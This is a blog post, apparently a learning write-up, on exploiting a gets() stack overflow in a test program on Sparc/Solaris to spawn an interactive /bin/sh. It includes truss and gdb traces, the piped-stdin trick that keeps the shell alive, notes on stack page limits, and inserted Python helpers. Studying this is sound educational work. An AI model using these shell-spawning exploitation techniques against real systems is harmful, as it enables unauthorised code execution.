sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGURG, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8)    = 0
sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8)    = 0
sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8)     = 0
sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8)     = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
ioctl(0, TCGETS, 0x000391B0)                    Err#25 ENOTTY
$ write(2, " $  ", 2)                           = 2
read(0, 0x000394D0, 128)                        = 0
fcntl(0, F_GETFL, 0x00000000)                   = 8192
fstat64(0, 0xFFBEFC28)                          = 0
ioctl(0, TCGETA, 0xFFBEFD7C)                    Err#25 ENOTTY
close(0)                                        = 0
llseek(0, 0, SEEK_CUR)                          Err#9 EBADF
_exit(0)
-bash-4.3$

I finally start to put 2 and 2 together…

$PWD/invoke2 v < payload

The above snippet was the problem. Since I was piping from the file, by the time the shell gets spawned its stdin is already exhausted, so it's just like: "I GUESS I'M FINISHED HERE.. EOF". That is the read(0, ...) = 0 followed by _exit(0) at the end of the truss output.

Here's my temporary happiness, inspired by http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe
Here's a temporary solution, without the beauty of a raw tty (you may have to hit enter once at the beginning and again after doing an 'exit'):

Notes
The difference between invoking /bin/sh -i and plain /bin/bash is that -i automatically adds the $ prompt. I could not find a way to set the prompt manually when using /bin/sh through cat without -i.

Here's an example of the exploit running; it does an execve of /bin/sh -i.

# anything enclosed in [] is note from me added after execution

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ (cat payload; cat) | $PWD/invoke2 v
sp = 0xffbefdb8
[hangs here until you hit enter key, probably an incident of using cat and cooked input]
$ ls
alternating_payload2       asmshell2.bin              exec                       payload3                   v2
alternating_payload2.c     asmshell3.bin              howto_a_payload            payload_asmshell6          v2.c
alternating_payload3       asmshell4.bin              invoke2                    payload_fix_fp             write_raw.bin
alternating_payload3.c     asmshell5_interactive.bin  ksh_shellcode              payload_trashed_fp
asm                        asmshell6.bin              magic_crash_length         readme.txt
asm_tcsh.bin               build_shellcode_steps      payload                    v
asmshell.bin               core                       payload2                   v.c
$ exit
[hangs here until you hit enter key again, probably an incident of using cat and cooked input]
-bash-4.3$
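To see the mechanism behind the (cat payload; cat) | ... trick, here is an added example (not from the original post) that spawns a shell from Python with its stdin on a pipe: closing the write end right after the payload makes the shell hit EOF and exit, which is the read(0, ...) = 0 followed by _exit(0) in the truss output above, while holding the write end open keeps the shell waiting for more commands. It assumes a POSIX sh on PATH.

```python
import subprocess
import time

# Added example, not code from the post: reproduces the EOF behaviour of a
# shell whose stdin is a pipe. Assumes a POSIX "sh" is on PATH.


def shell_exits_on_eof():
    """Feed one command, then close stdin: the shell sees EOF and exits.

    This is what `invoke2 v < payload` does. Once the file is consumed the
    spawned shell inherits an exhausted stdin, reads 0 bytes and exits 0,
    exactly the read(0, ...) = 0 and _exit(0) pair in the truss trace.
    """
    p = subprocess.Popen(["sh"], stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    out, _ = p.communicate(b"echo hi\n")  # write, close stdin, wait
    return {"returncode": p.returncode, "output": out.decode()}


def shell_stays_open_while_stdin_is_held(hold_seconds=0.5):
    """Keep the write end open after the command: the shell blocks in read(0).

    This is the `(cat payload; cat) | prog` trick: the trailing cat keeps the
    pipe open, so the shell waits for more input instead of exiting.
    """
    p = subprocess.Popen(["sh"], stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    p.stdin.write(b"echo hi\n")
    p.stdin.flush()
    time.sleep(hold_seconds)
    still_running = p.poll() is None  # no EOF yet, so the shell is alive
    out, _ = p.communicate()          # now close stdin; shell exits on EOF
    return {"still_running_before_eof": still_running,
            "returncode": p.returncode, "output": out.decode()}


if __name__ == "__main__":
    print(shell_exits_on_eof())
    print(shell_stays_open_while_stdin_is_held())
```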

Figure out how much space there is until overflow into Libc (that’s bad)

(gdb) q
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload
-bash-4.3$ $PWD/invoke2 -d v
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(gdb) b 16
Breakpoint 1 at 0x10750: file v.c, line 16.
(gdb) r < payload
Starting program: /home/bazz/latest/v < payload
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
sp = 0xffbefda0

Program received signal SIGSEGV, Segmentation fault.
0xff2c3064 in memccpy () from /usr/lib/libc.so.1
(gdb)

The only logical explanation is that the buffer needs to be shortened. It must be overwriting libc, or some SUPER out-of-bounds area... maybe it completely went off the charts. I dunno, I try to understand it but it isn't working, so I just cut the buffer down. Actually, I just learned, using the pmap tool and trialing the buffer size, that the stack is allocated 8K from FFBEE000:
FFBEE000 8K read/write/exec [ stack ]
FFBEE000 + 8K (0x2000) = 0xFFBF0000
so the overflow ran past that page boundary, which is why gdb cannot access 0xffbf0000 below.

(gdb)
0xffbeff80:     0x03424242      0x03434343      0x03444444      0x03454545
0xffbeff90:     0x03464646      0x03474747      0x03484848      0x03494949
0xffbeffa0:     0x034a4a4a      0x034b4b4b      0x034c4c4c      0x034d4d4d
0xffbeffb0:     0x034e4e4e      0x034f4f4f      0x03505050      0x03515151
0xffbeffc0:     0x03525252      0x03535353      0x03545454      0x03555555
0xffbeffd0:     0x03565656      0x03575757      0x03585858      0x03595959
0xffbeffe0:     0x035a5a5a      0x04414141      0x04424242      0x04434343
0xffbefff0:     0x04444444      0x04454545
(gdb)
0xffbefff8:     0x04464646      0x04470000      Cannot access memory at address 0xffbf0000
(gdb)

NOTE!! When exploiting gets(), it is IMPERATIVE to terminate with a 0x0a rather than a null byte; it plays the leading role in string termination. I didn't do that above and it led to hairy things: I had to hit enter myself, causing a \r\n, which is why the last 2 bytes are 0000; that was the space needed for the \r\n, I assume. You can get rid of this by using 0x0a in your buffer.
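As an added example (not the post's code), the page-boundary arithmetic from the pmap figures above and the decoding of the alternating-payload marker words in the gdb dump, in Python. The dump excerpt is constructed from the lines shown above, and the marker layout (one cycle byte followed by the same letter three times) is read off those words; it also flags the truncated last word 0x04470000 that the note above explains.

```python
STACK_BASE = 0xFFBEE000  # start of the [ stack ] mapping, from the pmap line above
STACK_SIZE = 8 * 1024    # its size, 8K (0x2000)

# Constructed excerpt of the gdb dump on the page (the last three x/4wx lines).
GDB_DUMP = """\
0xffbeffe0:     0x035a5a5a      0x04414141      0x04424242      0x04434343
0xffbefff0:     0x04444444      0x04454545
0xffbefff8:     0x04464646      0x04470000      Cannot access memory at address 0xffbf0000
"""

def stack_top(base=STACK_BASE, size=STACK_SIZE):
    """First address past the mapping; touching it gives the SIGSEGV seen above."""
    return base + size

def headroom(addr, base=STACK_BASE, size=STACK_SIZE):
    """Bytes from addr to the end of the mapping, or 0 if addr lies outside it."""
    top = base + size
    return top - addr if base <= addr < top else 0

def parse_gdb_dump(text):
    """Map each dumped address to its 32-bit word, ignoring gdb's error text."""
    words = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        addr_s, rest = line.split(":", 1)
        addr = int(addr_s, 16)
        for tok in rest.split():
            if not tok.startswith("0x"):
                break  # "Cannot access memory ..." follows the last word
            words[addr] = int(tok, 16)
            addr += 4
    return words

def decode_marker(word):
    """Split a marker word into (cycle, letter, intact).

    The alternating payload emits a cycle byte then the same letter three
    times, so 0x03424242 is cycle 3, 'B'.  intact is False when the trailing
    bytes differ, as in 0x04470000 where the \\r\\n clobbered the last two.
    """
    cycle = word >> 24
    tail = [(word >> s) & 0xFF for s in (16, 8, 0)]
    return cycle, chr(tail[0]), all(b == tail[0] for b in tail)

def last_mapped_word(text, base=STACK_BASE, size=STACK_SIZE):
    """Highest dumped address still inside the stack mapping and its marker."""
    words = parse_gdb_dump(text)
    addr = max(a for a in words if headroom(a, base, size) > 0)
    return addr, decode_marker(words[addr])
```

With sp = 0xffbefda0 from the gdb run, headroom() reports 0x260 (608) bytes up to 0xFFBF0000, which is the ceiling any payload placed above that sp has to respect.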

In the scheme of exploiting apply, the program can be spawned an unlimited number of times.

To get really sweet, it’s time to open our own TTY to “write” our shellcode through and eventually our own terminal to directly operate with the shell on the other end :)

Notes on my Blade 150

There is a 0x18-byte difference between the debug and production return address offsets. This difference does not exist on the school production servers.
i.e.
e50 # debug return address - 8
e68 # production return address - 8

To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops

Posted in Bash, buffer overflow, Sparc/Solaris
